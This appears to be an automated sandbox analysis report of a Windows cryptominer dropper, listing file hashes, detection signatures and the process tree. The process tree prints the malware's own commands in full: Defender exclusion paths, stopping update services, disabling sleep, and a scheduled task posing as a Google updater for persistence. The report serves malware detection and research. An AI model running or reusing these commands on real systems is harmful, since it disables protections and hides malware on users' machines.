Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
08-08-2023 06:06
Static task
static1
Behavioral task
behavioral1
Sample
fb104405d5f6a628687964d86dc7c6b4d456aa8645d0d.exe
Resource
win7-20230712-en
General
-
Target
fb104405d5f6a628687964d86dc7c6b4d456aa8645d0d.exe
-
Size
385KB
-
MD5
b289e58e4bfd1f1577b480dcbd0b00d1
-
SHA1
70700a0b417fbbe9285984e7925d88a4091a2aff
-
SHA256
fb104405d5f6a628687964d86dc7c6b4d456aa8645d0d618bd91f2102c9c3760
-
SHA512
9387fe7fc4f561f832e7069597d05f39df8ecf9513fa787913567dbc52f9fa49ed3559cbe78af8605b98e04176b1521a97d701245e092f710a2f6d0a8915d707
-
SSDEEP
6144:6ziAiPfbfHD4kF4Ncf1N6lGOnF+ZNi9Vwsa:6uhPzfj4kF43T0P2ys
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 4432 created 3108 4432 setup.exe 37 PID 4432 created 3108 4432 setup.exe 37 PID 4432 created 3108 4432 setup.exe 37 PID 4432 created 3108 4432 setup.exe 37 PID 4432 created 3108 4432 setup.exe 37 PID 2452 created 3108 2452 updater.exe 37 PID 2452 created 3108 2452 updater.exe 37 PID 2452 created 3108 2452 updater.exe 37 PID 2452 created 3108 2452 updater.exe 37 PID 2452 created 3108 2452 updater.exe 37 PID 2452 created 3108 2452 updater.exe 37 -
XMRig Miner payload 7 IoCs
resource yara_rule behavioral2/memory/2452-312-0x00007FF69FDD0000-0x00007FF6A0FF6000-memory.dmp xmrig behavioral2/memory/3840-315-0x00007FF7182E0000-0x00007FF718ACF000-memory.dmp xmrig behavioral2/memory/3840-317-0x00007FF7182E0000-0x00007FF718ACF000-memory.dmp xmrig behavioral2/memory/3840-319-0x00007FF7182E0000-0x00007FF718ACF000-memory.dmp xmrig behavioral2/memory/3840-321-0x00007FF7182E0000-0x00007FF718ACF000-memory.dmp xmrig behavioral2/memory/3840-323-0x00007FF7182E0000-0x00007FF718ACF000-memory.dmp xmrig behavioral2/memory/3840-325-0x00007FF7182E0000-0x00007FF718ACF000-memory.dmp xmrig -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts updater.exe File created C:\Windows\System32\drivers\etc\hosts setup.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 3 IoCs
pid Process 3872 mi.exe 4432 setup.exe 2452 updater.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0008000000023210-173.dat themida behavioral2/files/0x0008000000023210-179.dat themida behavioral2/files/0x0008000000023210-180.dat themida behavioral2/memory/4432-182-0x00007FF741B80000-0x00007FF742DA6000-memory.dmp themida behavioral2/memory/4432-181-0x00007FF741B80000-0x00007FF742DA6000-memory.dmp themida behavioral2/memory/4432-184-0x00007FF741B80000-0x00007FF742DA6000-memory.dmp themida behavioral2/memory/4432-186-0x00007FF741B80000-0x00007FF742DA6000-memory.dmp themida behavioral2/memory/4432-187-0x00007FF741B80000-0x00007FF742DA6000-memory.dmp themida behavioral2/memory/4432-188-0x00007FF741B80000-0x00007FF742DA6000-memory.dmp themida behavioral2/memory/4432-190-0x00007FF741B80000-0x00007FF742DA6000-memory.dmp themida behavioral2/memory/4432-191-0x00007FF741B80000-0x00007FF742DA6000-memory.dmp themida behavioral2/memory/4432-192-0x00007FF741B80000-0x00007FF742DA6000-memory.dmp themida behavioral2/memory/4432-229-0x00007FF741B80000-0x00007FF742DA6000-memory.dmp themida behavioral2/files/0x0008000000023217-231.dat themida behavioral2/memory/2452-232-0x00007FF69FDD0000-0x00007FF6A0FF6000-memory.dmp themida behavioral2/memory/2452-234-0x00007FF69FDD0000-0x00007FF6A0FF6000-memory.dmp themida behavioral2/memory/2452-235-0x00007FF69FDD0000-0x00007FF6A0FF6000-memory.dmp themida behavioral2/memory/2452-236-0x00007FF69FDD0000-0x00007FF6A0FF6000-memory.dmp themida behavioral2/memory/2452-237-0x00007FF69FDD0000-0x00007FF6A0FF6000-memory.dmp themida behavioral2/memory/2452-238-0x00007FF69FDD0000-0x00007FF6A0FF6000-memory.dmp themida behavioral2/memory/2452-239-0x00007FF69FDD0000-0x00007FF6A0FF6000-memory.dmp themida behavioral2/memory/2452-266-0x00007FF69FDD0000-0x00007FF6A0FF6000-memory.dmp themida behavioral2/memory/2452-303-0x00007FF69FDD0000-0x00007FF6A0FF6000-memory.dmp themida behavioral2/files/0x0008000000023217-308.dat themida behavioral2/memory/2452-312-0x00007FF69FDD0000-0x00007FF6A0FF6000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4432 setup.exe 2452 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2452 set thread context of 416 2452 updater.exe 133 PID 2452 set thread context of 3840 2452 updater.exe 134 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe setup.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2732 sc.exe 3092 sc.exe 3600 sc.exe 3280 sc.exe 1088 sc.exe 2696 sc.exe 3684 sc.exe 4100 sc.exe 3164 sc.exe 3312 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3324 2692 WerFault.exe 80 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2692 fb104405d5f6a628687964d86dc7c6b4d456aa8645d0d.exe 2692 fb104405d5f6a628687964d86dc7c6b4d456aa8645d0d.exe 2692 fb104405d5f6a628687964d86dc7c6b4d456aa8645d0d.exe 2692 fb104405d5f6a628687964d86dc7c6b4d456aa8645d0d.exe 4432 setup.exe 4432 setup.exe 4568 powershell.exe 4568 powershell.exe 4432 setup.exe 4432 setup.exe 4432 setup.exe 4432 setup.exe 4432 setup.exe 4432 setup.exe 3696 powershell.exe 3696 powershell.exe 4432 setup.exe 4432 setup.exe 2452 updater.exe 2452 updater.exe 1200 powershell.exe 1200 powershell.exe 2452 updater.exe 2452 updater.exe 2452 updater.exe 2452 updater.exe 2452 updater.exe 2452 updater.exe 3400 powershell.exe 3400 powershell.exe 2452 updater.exe 2452 updater.exe 2452 updater.exe 2452 updater.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe 3840 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 672 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2692 fb104405d5f6a628687964d86dc7c6b4d456aa8645d0d.exe Token: SeDebugPrivilege 4568 powershell.exe Token: SeShutdownPrivilege 2780 powercfg.exe Token: SeCreatePagefilePrivilege 2780 powercfg.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeShutdownPrivilege 2432 powercfg.exe Token: SeCreatePagefilePrivilege 2432 powercfg.exe Token: SeShutdownPrivilege 3708 powercfg.exe Token: SeCreatePagefilePrivilege 3708 powercfg.exe Token: SeShutdownPrivilege 5100 powercfg.exe Token: SeCreatePagefilePrivilege 5100 powercfg.exe Token: SeIncreaseQuotaPrivilege 3696 powershell.exe Token: SeSecurityPrivilege 3696 powershell.exe Token: SeTakeOwnershipPrivilege 3696 powershell.exe Token: SeLoadDriverPrivilege 3696 powershell.exe Token: SeSystemProfilePrivilege 3696 powershell.exe Token: SeSystemtimePrivilege 3696 powershell.exe Token: SeProfSingleProcessPrivilege 3696 powershell.exe Token: SeIncBasePriorityPrivilege 3696 powershell.exe Token: SeCreatePagefilePrivilege 3696 powershell.exe Token: SeBackupPrivilege 3696 powershell.exe Token: SeRestorePrivilege 3696 powershell.exe Token: SeShutdownPrivilege 3696 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeSystemEnvironmentPrivilege 3696 powershell.exe Token: SeRemoteShutdownPrivilege 3696 powershell.exe Token: SeUndockPrivilege 3696 powershell.exe Token: SeManageVolumePrivilege 3696 powershell.exe Token: 33 3696 powershell.exe Token: 34 3696 powershell.exe Token: 35 3696 powershell.exe Token: 36 3696 powershell.exe Token: SeIncreaseQuotaPrivilege 3696 powershell.exe Token: SeSecurityPrivilege 3696 powershell.exe Token: SeTakeOwnershipPrivilege 3696 powershell.exe Token: SeLoadDriverPrivilege 3696 powershell.exe Token: SeSystemProfilePrivilege 3696 powershell.exe Token: SeSystemtimePrivilege 3696 powershell.exe Token: SeProfSingleProcessPrivilege 3696 powershell.exe Token: SeIncBasePriorityPrivilege 3696 powershell.exe Token: SeCreatePagefilePrivilege 3696 powershell.exe Token: SeBackupPrivilege 3696 powershell.exe Token: SeRestorePrivilege 3696 powershell.exe Token: SeShutdownPrivilege 3696 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeSystemEnvironmentPrivilege 3696 powershell.exe Token: SeRemoteShutdownPrivilege 3696 powershell.exe Token: SeUndockPrivilege 3696 powershell.exe Token: SeManageVolumePrivilege 3696 powershell.exe Token: 33 3696 powershell.exe Token: 34 3696 powershell.exe Token: 35 3696 powershell.exe Token: 36 3696 powershell.exe Token: SeIncreaseQuotaPrivilege 3696 powershell.exe Token: SeSecurityPrivilege 3696 powershell.exe Token: SeTakeOwnershipPrivilege 3696 powershell.exe Token: SeLoadDriverPrivilege 3696 powershell.exe Token: SeSystemProfilePrivilege 3696 powershell.exe Token: SeSystemtimePrivilege 3696 powershell.exe Token: SeProfSingleProcessPrivilege 3696 powershell.exe Token: SeIncBasePriorityPrivilege 3696 powershell.exe Token: SeCreatePagefilePrivilege 3696 powershell.exe Token: SeBackupPrivilege 3696 powershell.exe Token: SeRestorePrivilege 3696 powershell.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 2692 wrote to memory of 3872 2692 fb104405d5f6a628687964d86dc7c6b4d456aa8645d0d.exe 89 PID 2692 wrote to memory of 3872 2692 fb104405d5f6a628687964d86dc7c6b4d456aa8645d0d.exe 89 PID 2692 wrote to memory of 3872 2692 fb104405d5f6a628687964d86dc7c6b4d456aa8645d0d.exe 89 PID 3872 wrote to memory of 4432 3872 mi.exe 93 PID 3872 wrote to memory of 4432 3872 mi.exe 93 PID 380 wrote to memory of 2732 380 cmd.exe 100 PID 380 wrote to memory of 2732 380 cmd.exe 100 PID 380 wrote to memory of 3600 380 cmd.exe 101 PID 380 wrote to memory of 3600 380 cmd.exe 101 PID 380 wrote to memory of 3280 380 cmd.exe 102 PID 380 wrote to memory of 3280 380 cmd.exe 102 PID 380 wrote to memory of 1088 380 cmd.exe 103 PID 380 wrote to memory of 1088 380 cmd.exe 103 PID 380 wrote to memory of 2696 380 cmd.exe 104 PID 380 wrote to memory of 2696 380 cmd.exe 104 PID 3368 wrote to memory of 2780 3368 cmd.exe 109 PID 3368 wrote to memory of 2780 3368 cmd.exe 109 PID 3368 wrote to memory of 2432 3368 cmd.exe 110 PID 3368 wrote to memory of 2432 3368 cmd.exe 110 PID 3368 wrote to memory of 3708 3368 cmd.exe 111 PID 3368 wrote to memory of 3708 3368 cmd.exe 111 PID 3368 wrote to memory of 5100 3368 cmd.exe 112 PID 3368 wrote to memory of 5100 3368 cmd.exe 112 PID 1916 wrote to memory of 3684 1916 cmd.exe 120 PID 1916 wrote to memory of 3684 1916 cmd.exe 120 PID 1916 wrote to memory of 4100 1916 cmd.exe 121 PID 1916 wrote to memory of 4100 1916 cmd.exe 121 PID 1916 wrote to memory of 3164 1916 cmd.exe 122 PID 1916 wrote to memory of 3164 1916 cmd.exe 122 PID 1916 wrote to memory of 3092 1916 cmd.exe 123 PID 1916 wrote to memory of 3092 1916 cmd.exe 123 PID 1916 wrote to memory of 3312 1916 cmd.exe 124 PID 1916 wrote to memory of 3312 1916 cmd.exe 124 PID 3392 wrote to memory of 3848 3392 cmd.exe 129 PID 3392 wrote to memory of 3848 3392 cmd.exe 129 PID 3392 wrote to memory of 4040 3392 cmd.exe 130 PID 3392 wrote to memory of 4040 3392 cmd.exe 130 PID 3392 wrote to memory of 968 3392 cmd.exe 131 PID 3392 wrote to memory of 968 3392 cmd.exe 131 PID 3392 wrote to memory of 4544 3392 cmd.exe 132 PID 3392 wrote to memory of 4544 3392 cmd.exe 132 PID 2452 wrote to memory of 416 2452 updater.exe 133 PID 2452 wrote to memory of 3840 2452 updater.exe 134
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3108
-
C:\Users\Admin\AppData\Local\Temp\fb104405d5f6a628687964d86dc7c6b4d456aa8645d0d.exe"C:\Users\Admin\AppData\Local\Temp\fb104405d5f6a628687964d86dc7c6b4d456aa8645d0d.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Users\Admin\AppData\Local\Temp\mi.exe"C:\Users\Admin\AppData\Local\Temp\mi.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\Temp\setup.exe"C:\Windows\Temp\setup.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4432
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 17803⤵
- Program crash
PID:3324
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2732
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3600
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3280
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1088
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2696
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:5100
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3696
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:1640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1200
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3684
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4100
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3164
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3092
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3312
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:3848
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4040
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:968
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:4544
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3400
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:416
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3840
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2692 -ip 26921⤵PID:2040
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2452
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
Filesize
9.7MB
MD584741bc02d2e9226a943aa03b6a4568d
SHA1617d01316011faf77fba30d49ae1e86ff988380a
SHA256fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA5121c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
